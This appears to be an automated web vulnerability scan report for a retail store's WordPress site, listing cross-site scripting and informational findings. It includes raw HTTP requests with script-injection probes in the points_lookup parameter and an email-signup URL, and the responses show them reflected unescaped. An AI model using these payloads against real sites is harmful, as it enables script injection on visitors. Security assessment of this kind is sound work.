1. Cross-site scripting (reflected)
1.1. https://www.bobstores.com/rewards/check-your-points [points_lookup parameter]
1.2. https://www.bobstores.com/rewards/check-your-points [points_lookup parameter]
2. Cross-domain script include
2.1. https://www.bobstores.com/
2.2. https://www.bobstores.com/about/
2.3. https://www.bobstores.com/apparel/mens/
2.4. https://www.bobstores.com/apple-touch-icon.png
2.5. https://www.bobstores.com/careers/
2.6. https://www.bobstores.com/contact-us/
2.7. https://www.bobstores.com/faqs/
2.8. https://www.bobstores.com/gift-cards/
2.9. https://www.bobstores.com/privacy-policy/
2.10. https://www.bobstores.com/rewards
2.11. https://www.bobstores.com/rewards/
2.12. https://www.bobstores.com/rewards/check-your-points
2.13. https://www.bobstores.com/rewards/check-your-points/
2.14. https://www.bobstores.com/rewards/email-signup
2.15. https://www.bobstores.com/seasonal-promo/
2.16. https://www.bobstores.com/store-locator
2.17. https://www.bobstores.com/terms-conditions/
2.18. https://www.bobstores.com/wp-content/themes/bobs/ie.css
2.19. https://www.bobstores.com/wp-content/themes/bobs/images/bg_nav_on.jpg
4.1. https://www.bobstores.com/comments/feed/
4.2. https://www.bobstores.com/rewards/check-your-points/feed/
4.3. https://www.bobstores.com/wp-includes/wlwmanifest.xml
4.4. https://www.bobstores.com/xmlrpc.php
Severity: | High |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /rewards/check-your |
POST /rewards/check-your Host: www.bobstores.com Connection: keep-alive Referer: http://www.bobstores.com/ Cache-Control: max-age=0 Origin: http://www.bobstores.com Content-Type: application/x-www-form Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=t5fv28tgf4 Content-Length: 17 points_lookup=%27e0762<script>alert(1)< |
HTTP/1.1 200 OK Date: Sun, 02 Jan 2011 13:14:45 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9503 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <em>‘e0762<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /rewards/check-your |
POST /rewards/check-your Host: www.bobstores.com Connection: keep-alive Referer: http://www.bobstores.com/ Cache-Control: max-age=0 Origin: http://www.bobstores.com Content-Type: application/x-www-form Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=t5fv28tgf4 Content-Length: 17 points_lookup=%27c99b8"><script>alert(1)< |
HTTP/1.1 200 OK Date: Sun, 02 Jan 2011 13:14:41 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9514 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <input type="text" id="header-points" class="check-points" value="\'c99b8\"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /rewards/email-signup |
GET /rewards/email-signup?a3b07"><script>alert(1)< Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 302 Found Date: Sun, 02 Jan 2011 13:14:57 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Location: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 12609 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <form action="/rewards/email ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | / |
GET / HTTP/1.1 Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 302 Found Date: Sun, 02 Jan 2011 13:15:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Location: http://www.bobstores.com/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 17288 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <!-- script START --> <script type="text/javascript" src="http://code.jquery ...[SNIP]... </script> <script type="text/javascript" src="http://maps.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /about/ |
GET /about/ HTTP/1.1 Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 302 Found Date: Sun, 02 Jan 2011 13:15:36 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Location: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10596 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <!-- script START --> <script type="text/javascript" src="http://code.jquery ...[SNIP]... </script> <script type="text/javascript" src="http://maps.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /apparel/mens/ |
GET /apparel/mens/ HTTP/1.1 Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 302 Found Date: Sun, 02 Jan 2011 13:15:24 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Location: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15571 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <!-- script START --> <script type="text/javascript" src="http://code.jquery ...[SNIP]... </script> <script type="text/javascript" src="http://maps.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /apple-touch-icon.png |
GET /apple-touch-icon.png HTTP/1.1 Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 302 Found Date: Sun, 02 Jan 2011 13:14:43 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sun, 02 Jan 2011 13:14:43 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: http://www.bobstores.com Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8955 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <!-- script START --> <script type="text/javascript" src="http://code.jquery ...[SNIP]... </script> <script type="text/javascript" src="http://maps.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /careers/ |
GET /careers/ HTTP/1.1 Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 302 Found Date: Sun, 02 Jan 2011 13:15:36 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Location: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9862 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <!-- script START --> <script type="text/javascript" src="http://code.jquery ...[SNIP]... </script> <script type="text/javascript" src="http://maps.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /contact-us/ |
GET /contact-us/ HTTP/1.1 Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 302 Found Date: Sun, 02 Jan 2011 13:15:36 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Location: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 18975 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <!-- script START --> <script type="text/javascript" src="http://code.jquery ...[SNIP]... </script> <script type="text/javascript" src="http://maps.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /faqs/ |
GET /faqs/ HTTP/1.1 Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 302 Found Date: Sun, 02 Jan 2011 13:15:39 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Location: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 11316 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <!-- script START --> <script type="text/javascript" src="http://code.jquery ...[SNIP]... </script> <script type="text/javascript" src="http://maps.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /gift-cards/ |
GET /gift-cards/ HTTP/1.1 Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 302 Found Date: Sun, 02 Jan 2011 13:15:23 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Location: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10903 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <!-- script START --> <script type="text/javascript" src="http://code.jquery ...[SNIP]... </script> <script type="text/javascript" src="http://maps.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /privacy-policy/ |
GET /privacy-policy/ HTTP/1.1 Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 302 Found Date: Sun, 02 Jan 2011 13:15:39 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Location: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20003 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <!-- script START --> <script type="text/javascript" src="http://code.jquery ...[SNIP]... </script> <script type="text/javascript" src="http://maps.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /rewards |
GET /rewards HTTP/1.1 Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 302 Found Date: Sun, 02 Jan 2011 13:15:30 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Location: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10485 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <!-- script START --> <script type="text/javascript" src="http://code.jquery ...[SNIP]... </script> <script type="text/javascript" src="http://maps.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /rewards/ |
GET /rewards/ HTTP/1.1 Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 302 Found Date: Sun, 02 Jan 2011 13:14:35 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Location: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10485 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <!-- script START --> <script type="text/javascript" src="http://code.jquery ...[SNIP]... </script> <script type="text/javascript" src="http://maps.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /rewards/check-your |
POST /rewards/check-your Host: www.bobstores.com Connection: keep-alive Referer: http://www.bobstores.com/ Cache-Control: max-age=0 Origin: http://www.bobstores.com Content-Type: application/x-www-form Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=t5fv28tgf4 Content-Length: 17 points_lookup=%27 |
HTTP/1.1 200 OK Date: Sun, 02 Jan 2011 13:12:36 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9421 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <!-- script START --> <script type="text/javascript" src="http://code.jquery ...[SNIP]... </script> <script type="text/javascript" src="http://maps.google ...[SNIP]... <p> <script type="text/javascript" src="https://seal.thawte ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /rewards/check-your |
GET /rewards/check-your Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 302 Found Date: Sun, 02 Jan 2011 13:14:06 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Location: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9437 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <!-- script START --> <script type="text/javascript" src="http://code.jquery ...[SNIP]... </script> <script type="text/javascript" src="http://maps.google ...[SNIP]... <p> <script type="text/javascript" src="https://seal.thawte ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /rewards/email-signup |
GET /rewards/email-signup HTTP/1.1 Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 200 OK Date: Sun, 02 Jan 2011 13:13:57 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 12516 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <!-- script START --> <script type="text/javascript" src="http://code.jquery ...[SNIP]... </script> <script type="text/javascript" src="http://maps.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /seasonal-promo/ |
GET /seasonal-promo/ HTTP/1.1 Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 302 Found Date: Sun, 02 Jan 2011 13:15:33 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Location: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10472 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <!-- script START --> <script type="text/javascript" src="http://code.jquery ...[SNIP]... </script> <script type="text/javascript" src="http://maps.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /store-locator |
GET /store-locator HTTP/1.1 Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 302 Found Date: Sun, 02 Jan 2011 13:16:08 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Location: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9633 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <!-- script START --> <script type="text/javascript" src="http://code.jquery ...[SNIP]... </script> <script type="text/javascript" src="http://maps.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /terms-conditions/ |
GET /terms-conditions/ HTTP/1.1 Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 302 Found Date: Sun, 02 Jan 2011 13:15:40 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Location: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13217 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <!-- script START --> <script type="text/javascript" src="http://code.jquery ...[SNIP]... </script> <script type="text/javascript" src="http://maps.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /wp-content/themes/bobs |
GET /wp-content/themes/bobs Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 302 Found Date: Sun, 02 Jan 2011 13:15:03 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sun, 02 Jan 2011 13:15:04 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: http://www.bobstores.com Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8964 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <!-- script START --> <script type="text/javascript" src="http://code.jquery ...[SNIP]... </script> <script type="text/javascript" src="http://maps.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /wp-content/themes/bobs |
GET /wp-content/themes/bobs Host: www.bobstores.com Connection: keep-alive Referer: https://www.bobstores.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=t5fv28tgf4 |
HTTP/1.1 302 Found Date: Sun, 02 Jan 2011 13:32:31 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Sun, 02 Jan 2011 13:32:31 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: http://www.bobstores.com Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8978 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <!-- script START --> <script type="text/javascript" src="http://code.jquery ...[SNIP]... </script> <script type="text/javascript" src="http://maps.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /terms-conditions/ |
GET /terms-conditions/ HTTP/1.1 Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 302 Found Date: Sun, 02 Jan 2011 13:15:40 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Location: http://www.bobstores.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13217 <!DOCTYPE html> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="https://www <link rel="apple-touch-icon" href="/apple-touch-icon <meta ...[SNIP]... <a href="mailto:customerservice@bobstores ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /comments/feed/ |
GET /comments/feed/ HTTP/1.1 Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 200 OK Date: Sun, 02 Jan 2011 13:14:50 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Last-Modified: Mon, 01 Nov 2010 18:40:28 GMT ETag: "90bf8a772bea2a86492 Content-Length: 1429 Connection: close Content-Type: text/xml; charset=UTF-8 <?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http:/ xmlns:dc="http://purl.org xmlns:atom="http://www.w3 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /rewards/check-your |
GET /rewards/check-your Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 200 OK Date: Sun, 02 Jan 2011 13:13:58 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 X-Pingback: http://www.bobstores.com Last-Modified: Mon, 01 Nov 2010 18:40:28 GMT ETag: "90bf8a772bea2a86492 Content-Length: 743 Connection: close Content-Type: text/xml; charset=UTF-8 <?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http:/ xmlns:dc="http://purl.org xmlns:atom="http://www.w3 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /wp-includes/wlwmanifest |
GET /wp-includes/wlwmanifest Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 200 OK Date: Sun, 02 Jan 2011 13:15:22 GMT Server: Apache/2.2.3 (Red Hat) Last-Modified: Mon, 01 Nov 2010 18:32:19 GMT ETag: "6348345-41d-4940207 Accept-Ranges: bytes Content-Length: 1053 Connection: close Content-Type: text/xml <?xml version="1.0" encoding="utf-8" ?> <manifest xmlns="http://schemas <options> <clientType>WordPress< <supportsKeywords>Yes< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.bobstores.com |
Path: | /xmlrpc.php |
GET /xmlrpc.php HTTP/1.1 Host: www.bobstores.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=136910627 |
HTTP/1.1 200 OK Date: Sun, 02 Jan 2011 13:15:16 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 42 Connection: close Content-Type: text/plain; charset=UTF-8 XML-RPC server accepts POST requests only. |